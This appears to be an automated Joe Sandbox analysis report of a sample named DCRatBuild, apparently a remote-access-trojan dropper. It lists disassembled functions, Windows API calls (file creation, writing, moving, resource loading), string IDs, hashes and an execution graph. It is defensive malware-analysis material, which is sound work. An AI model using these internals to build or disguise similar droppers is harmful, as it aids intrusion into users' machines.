                                                                                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                        • API String ID: 2190909847-396321323
                                                                                                                        • Opcode ID: fad87aedda45d9f0e98b645e548ef54e43177dca53b8ce2f7f1e4b25355146e7
                                                                                                                        • Instruction ID: b75850e00304c90afd2740a8305df19b992b85694f6d5e6cc9b19b219e2cf7db
                                                                                                                        • Opcode Fuzzy Hash: fad87aedda45d9f0e98b645e548ef54e43177dca53b8ce2f7f1e4b25355146e7
                                                                                                                        • Instruction Fuzzy Hash: 25110031601229ABEF25AF26DC45A6F3F54EF00724B14817BFC05DB351DA3C9E0A869D
                                                                                                                        Function 004A101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00010000,004A1160,?,00000000,00000000), ref: 004A1043
                                                                                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 004A108A
                                                                                                                          • Part of subcall function 00496C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00496C54
                                                                                                                          • Part of subcall function 00496DCB: _wcschr.LIBVCRUNTIME ref: 00496E0A
                                                                                                                          • Part of subcall function 00496DCB: _wcschr.LIBVCRUNTIME ref: 00496E19
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                                        • String ID: CreateThread failed
                                                                                                                        • API String ID: 2706921342-3849766595
                                                                                                                        • Opcode ID: ba8a16b95505b0cb63a4821749fb5c33e53360a90c2c32b2c1bfa7709eeba7e6
                                                                                                                        • Instruction ID: 655a613217d43811252492898985b5a21f4054bb2f9d7a25e0396c0d0b49c630
                                                                                                                        • Opcode Fuzzy Hash: ba8a16b95505b0cb63a4821749fb5c33e53360a90c2c32b2c1bfa7709eeba7e6
                                                                                                                        • Instruction Fuzzy Hash: 720126B63043097BD3306E64AC51F7673A8EB52751F20003FFB82566A0CAA86884862C
                                                                                                                        Function 0049C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: <9L$?*<>|"
                                                                                                                        • API String ID: 2691759472-3936930852
                                                                                                                        • Opcode ID: 46b87eb3c7f2aba75622156889eacc472c7f9b22c7a69783c43253cf01ad0f42
                                                                                                                        • Instruction ID: bf93300ebc977ddfa48b6e264e7c0f30fc3c7618deffac6c7c23b038c3a8df1e
                                                                                                                        • Opcode Fuzzy Hash: 46b87eb3c7f2aba75622156889eacc472c7f9b22c7a69783c43253cf01ad0f42
                                                                                                                        • Instruction Fuzzy Hash: 6AF0D157A85301C5DF302EA89981733B7E4EF95320F34482FE5C4C73C2E6A988C0826D
                                                                                                                        Function 004ADB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: Software\WinRAR SFX$J
                                                                                                                        • API String ID: 176396367-750066849
                                                                                                                        • Opcode ID: bb43f80c48922031492da068d7759a7e76b0501e7f095b2db9116a477dcdb1bf
                                                                                                                        • Instruction ID: 0093ecf13c9a404ae714249e154f2a8889476d649826989f3b8c7d249515d57d
                                                                                                                        • Opcode Fuzzy Hash: bb43f80c48922031492da068d7759a7e76b0501e7f095b2db9116a477dcdb1bf
                                                                                                                        • Instruction Fuzzy Hash: 86017171900118BADB219B51DC09FDB7F7CEB15355F000067B54A910A0DBB49B98C6F9
                                                                                                                        Function 004AAE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0049C29A: _wcslen.LIBCMT ref: 0049C2A2
                                                                                                                          • Part of subcall function 004A1FDD: _wcslen.LIBCMT ref: 004A1FE5
                                                                                                                          • Part of subcall function 004A1FDD: _wcslen.LIBCMT ref: 004A1FF6
                                                                                                                          • Part of subcall function 004A1FDD: _wcslen.LIBCMT ref: 004A2006
                                                                                                                          • Part of subcall function 004A1FDD: _wcslen.LIBCMT ref: 004A2014
                                                                                                                          • Part of subcall function 004A1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0049B371,?,?,00000000,?,?,?), ref: 004A202F
                                                                                                                          • Part of subcall function 004AAC04: SetCurrentDirectoryW.KERNELBASE(?,004AAE72,C:\Users\user\Desktop,00000000,004D946A,00000006), ref: 004AAC08
                                                                                                                        • _wcslen.LIBCMT ref: 004AAE8B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                                                        • String ID: <J$C:\Users\user\Desktop
                                                                                                                        • API String ID: 521417927-1902080862
                                                                                                                        • Opcode ID: ee2c8bb831f5f039621699663ca7e3d2bcd7d9b66a74749644b66454715e01fc
                                                                                                                        • Instruction ID: ea300d349391d596e2aa04036bead05adfaacfd9454370d7770b069a63b747a7
                                                                                                                        • Opcode Fuzzy Hash: ee2c8bb831f5f039621699663ca7e3d2bcd7d9b66a74749644b66454715e01fc
                                                                                                                        • Instruction Fuzzy Hash: 6A017171D40218A9DF10ABA6DD0AEDF73BCAF19308F00046BF505E3192E7BC9654CBA9
                                                                                                                        Function 004BBB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004B97E5: GetLastError.KERNEL32(?,004D1030,004B4674,004D1030,?,?,004B3F73,00000050,?,004D1030,00000200), ref: 004B97E9
                                                                                                                          • Part of subcall function 004B97E5: _free.LIBCMT ref: 004B981C
                                                                                                                          • Part of subcall function 004B97E5: SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B985D
                                                                                                                          • Part of subcall function 004B97E5: _abort.LIBCMT ref: 004B9863
                                                                                                                        • _abort.LIBCMT ref: 004BBB80
                                                                                                                        • _free.LIBCMT ref: 004BBBB4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_abort_free
                                                                                                                        • String ID: pL
                                                                                                                        • API String ID: 289325740-1374626527
                                                                                                                        • Opcode ID: 9d1a5426a0fa2b40a327411ba291062ba83c30272939f5efeda04fde518ce42f
                                                                                                                        • Instruction ID: 3384798dc2c6ccfd2446b4c1b0df7841a085203738e61dd0ad743c1447a645d3
                                                                                                                        • Opcode Fuzzy Hash: 9d1a5426a0fa2b40a327411ba291062ba83c30272939f5efeda04fde518ce42f
                                                                                                                        • Instruction Fuzzy Hash: 8E01A131D046219BCB61AF5AC801A9EB7A0FB04724B14011FE92467795CBBD7D01CFED
                                                                                                                        Function 004AB425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Malloc
                                                                                                                        • String ID: (J$ZJ
                                                                                                                        • API String ID: 2696272793-3263590397
                                                                                                                        • Opcode ID: 95748433cd52622f76c079b93b42bb5c10004296b2fff45ff6b11d1f99cf2ece
                                                                                                                        • Instruction ID: f899e6749f9499284b7abd10473e1ce642139158fac4167ff4a0ca1d8fa54216
                                                                                                                        • Opcode Fuzzy Hash: 95748433cd52622f76c079b93b42bb5c10004296b2fff45ff6b11d1f99cf2ece
                                                                                                                        • Instruction Fuzzy Hash: BC0169B6600108FF9F059FB0DC49CEEBBADEF19345700416AB906D7220EB31AA44DBA4
                                                                                                                        Function 004B8268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004BBF30: GetEnvironmentStringsW.KERNEL32 ref: 004BBF39
                                                                                                                          • Part of subcall function 004BBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BBF5C
                                                                                                                          • Part of subcall function 004BBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BBF82
                                                                                                                          • Part of subcall function 004BBF30: _free.LIBCMT ref: 004BBF95
                                                                                                                          • Part of subcall function 004BBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004BBFA4
                                                                                                                        • _free.LIBCMT ref: 004B82AE
                                                                                                                        • _free.LIBCMT ref: 004B82B5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                        • String ID: 0"O
                                                                                                                        • API String ID: 400815659-2600150691
                                                                                                                        • Opcode ID: 7b87134a766005e6104eaf441b7bc008ae5ab7d39120aab583fdc82cd7b4bdd8
                                                                                                                        • Instruction ID: 6d5b9288b41d3893cc73f1fcaeccfa39fd7b75af796cbd4317b687671b0ba367
                                                                                                                        • Opcode Fuzzy Hash: 7b87134a766005e6104eaf441b7bc008ae5ab7d39120aab583fdc82cd7b4bdd8
                                                                                                                        • Instruction Fuzzy Hash: 6AE0652360695245A669327B7C426FB160C8FD133CB5502AFF610D61D3DE9C8803C9BF
                                                                                                                        Function 004A0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,004A1206,?), ref: 004A0FEA
                                                                                                                        • GetLastError.KERNEL32(?), ref: 004A0FF6
                                                                                                                          • Part of subcall function 00496C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00496C54
                                                                                                                        Strings
                                                                                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 004A0FFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                        • API String ID: 1091760877-2248577382
                                                                                                                        • Opcode ID: e94f35b64239cb795c2a92976469f11af97109495ef4e8efbf37efc66acd7192
                                                                                                                        • Instruction ID: bb1488e5571efb34992fbe4900cad5c2e79750d9cba5390750ddb79316e914c5
                                                                                                                        • Opcode Fuzzy Hash: e94f35b64239cb795c2a92976469f11af97109495ef4e8efbf37efc66acd7192
                                                                                                                        • Instruction Fuzzy Hash: D5D02B3260812036CA2037295D05D7F3C049B62332F21472BF538506FACB1C0981429D
                                                                                                                        Function 0049E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,0049DA55,?), ref: 0049E2A3
                                                                                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0049DA55,?), ref: 0049E2B1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindHandleModuleResource
                                                                                                                        • String ID: RTL
                                                                                                                        • API String ID: 3537982541-834975271
                                                                                                                        • Opcode ID: 6da1e1d0a2802855d718f15f70df48fc9a58a3a74832a24cc999cc02cffd3975
                                                                                                                        • Instruction ID: 17e8b593a34bd936f6e89b65f8c7e3306d20af71a3dbda80672643a6d9494b01
                                                                                                                        • Opcode Fuzzy Hash: 6da1e1d0a2802855d718f15f70df48fc9a58a3a74832a24cc999cc02cffd3975
                                                                                                                        • Instruction Fuzzy Hash: CFC080326407106AEB705F767C0DF437F586B01B13F09446DB141E92D5D6E9C940C7E5
                                                                                                                        Function 004AE47A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE467
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: UJ$zJ
                                                                                                                        • API String ID: 1269201914-921788173
                                                                                                                        • Opcode ID: b557a1e653d1d2a806cf0021837c5d89cc2ab8c4eef54a1f556d399912169711
                                                                                                                        • Instruction ID: 895fbd48164b3ae8a25a523311d2b950b4ea00c8dde395dd3651120bb751e084
                                                                                                                        • Opcode Fuzzy Hash: b557a1e653d1d2a806cf0021837c5d89cc2ab8c4eef54a1f556d399912169711
                                                                                                                        • Instruction Fuzzy Hash: 71B012D57580007C314461175D02F37010CC1DEF15330802FF528C1086DD4C0E01053F
                                                                                                                        Function 004AE470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE467
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: UJ$pJ
                                                                                                                        • API String ID: 1269201914-2084652972
                                                                                                                        • Opcode ID: 98876692d50b36e9387a3dffb8d63557e21fd5675d94188d5e8e5f097a1341b3
                                                                                                                        • Instruction ID: 8c5b27a14cc86fb838336a614fd716efb8decd83b76020160d40842c39ed18de
                                                                                                                        • Opcode Fuzzy Hash: 98876692d50b36e9387a3dffb8d63557e21fd5675d94188d5e8e5f097a1341b3
                                                                                                                        • Instruction Fuzzy Hash: 4DB012C5759040BC3144A1171D02E37010CC1DEB55330C02FF928C1085DD4C4C01053F

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:6.4%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:6.1%
                                                                                                                        Total number of Nodes:1527
                                                                                                                        Total number of Limit Nodes:58
                                                                                                                        execution_graph 49719 9475f0 49720 94763c 49719->49720 49738 947857 49719->49738 49748 84abe0 49720->49748 49723 9478d9 49725 947670 49729 94768b 49725->49729 49730 947699 49725->49730 49726 9478dd 49835 84a8a0 49726->49835 49728 9478e7 49814 84a190 49729->49814 49730->49730 49826 84a720 40 API calls 4 library calls 49730->49826 49733 947697 49763 848860 49733->49763 49735 9476c9 CreateFileW 49736 947719 49735->49736 49737 9476fb CloseHandle 49735->49737 49767 87e0b0 63 API calls 49736->49767 49737->49738 49828 a15d9a 49738->49828 49740 947722 49768 9478f0 49740->49768 49742 947735 WriteFile 49743 947765 49742->49743 49744 94779d CloseHandle 49743->49744 49745 9477ab 49743->49745 49744->49745 49827 95ffb0 97 API calls _wcsrchr 49745->49827 49747 9477b6 49747->49738 49749 84ac18 49748->49749 49751 84ac6c 49748->49751 49839 a162a2 EnterCriticalSection 49749->49839 49753 a162a2 4 API calls 49751->49753 49762 84acf7 49751->49762 49755 84ac86 49753->49755 49754 84ac2e GetProcessHeap 49843 a1615a 41 API calls 49754->49843 49755->49762 49845 a1615a 41 API calls 49755->49845 49757 84ac5b 49844 a16258 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 49757->49844 49759 84ace6 49846 a16258 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 49759->49846 49762->49725 49762->49726 49764 84888d 49763->49764 49765 8488ae std::ios_base::_Ios_base_dtor 49763->49765 49764->49763 49764->49765 49848 a1b22f 49764->49848 49765->49735 49767->49740 49769 84abe0 50 API calls 49768->49769 49770 94792a 49769->49770 49771 947930 49770->49771 49772 9479ae 49770->49772 49774 94795e 49771->49774 49775 94797b 49771->49775 49773 84a8a0 2 API calls 49772->49773 49778 9479b8 49773->49778 49855 949690 71 API calls 49774->49855 49856 949690 71 API calls 49775->49856 49781 947a10 49778->49781 49779 947976 49779->49742 49780 947a80 49783 947aa0 GetModuleHandleW 49780->49783 49781->49780 49857 947f20 76 API calls 2 library calls 49781->49857 49785 947ad4 49783->49785 49786 947b09 49783->49786 49784 947a39 49858 862300 49784->49858 49788 a162a2 4 API calls 49785->49788 49790 947b61 49786->49790 49793 a162a2 4 API calls 49786->49793 49791 947ade 49788->49791 49789 947a46 MoveFileW 49794 947a78 49789->49794 49800 a162a2 4 API calls 49790->49800 49807 947bb9 49790->49807 49791->49786 49795 947aea GetProcAddress 49791->49795 49796 947b36 49793->49796 49794->49780 49799 947e01 49794->49799 49864 a16258 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 49795->49864 49796->49790 49798 947b42 GetProcAddress 49796->49798 49865 a16258 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 49798->49865 49893 a21697 15 API calls std::locale::_Setgloballocale 49799->49893 49803 947b8e 49800->49803 49806 947b9a GetProcAddress 49803->49806 49803->49807 49804 947e0b 49866 a16258 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 49806->49866 49809 947d95 49807->49809 49867 91d900 GetSystemDirectoryW 49807->49867 49892 9492f0 MoveFileW 49809->49892 49811 947da1 49812 a15d9a _ValidateLocalCookies 5 API calls 49811->49812 49813 947df9 49812->49813 49813->49742 50070 849f90 49814->50070 49817 84a1a6 FindResourceW 49818 84a222 49817->49818 49819 84a1bd 49817->49819 49818->49733 50077 84a050 LoadResource LockResource SizeofResource 49819->50077 49821 84a1c7 49821->49818 49822 84a1ee 49821->49822 50078 84a6b0 38 API calls 49821->50078 50079 a1f837 38 API calls 3 library calls 49822->50079 49825 84a1fe 49825->49733 49826->49733 49827->49747 49829 a15da3 IsProcessorFeaturePresent 49828->49829 49830 a15da2 49828->49830 49832 a164a3 49829->49832 49830->49723 50086 a16466 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 49832->50086 49834 a16586 49834->49723 49836 84a8ad 49835->49836 49837 a17b2a Concurrency::cancel_current_task RaiseException 49836->49837 49838 84a8ba RtlAllocateHeap 49837->49838 49838->49728 49841 a162b6 49839->49841 49842 84ac22 49841->49842 49847 a1632a SleepConditionVariableCS WaitForSingleObjectEx 